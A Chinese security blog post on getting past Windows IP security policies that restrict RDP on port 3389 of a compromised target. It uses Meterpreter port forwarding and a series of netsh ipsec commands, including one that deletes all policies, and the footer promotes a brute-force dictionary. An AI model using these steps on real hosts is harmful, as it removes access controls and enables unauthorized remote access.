IP安全策略限制3389登录的绕过方式

  • A+
所属分类:安全文章
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。


症状说明:

远程桌面由于以下原因之一无法连接到远程计算机:确保打开远程计算机,连接到网络并启用远程访问"。

IP安全策略限制3389登录的绕过方式

问题原因:

secpol.msc中设置了IP安全策略,如:仅允许或拒绝特定IP访问,或是直接拒绝了所有IP访问。可自定义IP安全规则,可以设置为任何IP和端口,支持的协议类型有:TCP/UDF/RDP/ICMP/EGP/RAW/RVD等。


IP安全策略这个功能有点类似于XP/2003的TCP/IP筛选,只是更加强大了

IP安全策略限制3389登录的绕过方式


解决方案:

(1) 使用Meterpreter的portfwd命令将目标的3389端口转发出来后即可成功绕过IP安全策略,因为最终流量是走的它本机,如:

  • 127.0.0.1:3389>-<127.0.0.1:22196

IP安全策略限制3389登录的绕过方式


(2) 直接在命令行使用以下几条Netsh ipsec命令添加或删除目标机器的IP安全策略规则来进行绕过。


添加IP安全策略:

netsh ipsec static add policy name=阻止3389端口

添加IP筛选器名:
netsh ipsec static add filterlist name=放行192.168.1.103

添加IP筛选器:
netsh ipsec static add filter filterlist=放行192.168.1.103 srcaddr=192.168.1.103 dstaddr=Me dstport=3389 protocol=TCP

添加筛选器操作:
netsh ipsec static add filteraction name=放行 action=permit or block

添加IP安全规则:
netsh ipsec static add rule name=放行192.168.1.103 policy=阻止3389端口 filterlist=放行192.168.1.103 filteraction=放行

激活指定安全策略:
netsh ipsec static set policy name=阻止3389端口 assign=y or n

导出IP安全策略:
netsh ipsec static exportpolicy C:WindowsdebugWIAip.ipsec

导入IP安全策略:
netsh ipsec static importpolicy C:WindowsdebugWIAip.ipsec

删除所有安全策略:
netsh ipsec static del all



只需关注公众号并回复“9527”即可获取一套HTB靶场学习文档和视频,1120”获取安全参考等安全杂志PDF电子版,1208”获取个人常用高效爆破字典0221”获取2020年酒仙桥文章打包还在等什么?赶紧关注学习吧!

推 荐 阅 读




IP安全策略限制3389登录的绕过方式
IP安全策略限制3389登录的绕过方式
IP安全策略限制3389登录的绕过方式

欢 迎 私 下 骚 扰



IP安全策略限制3389登录的绕过方式

本文始发于微信公众号(潇湘信安):IP安全策略限制3389登录的绕过方式

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: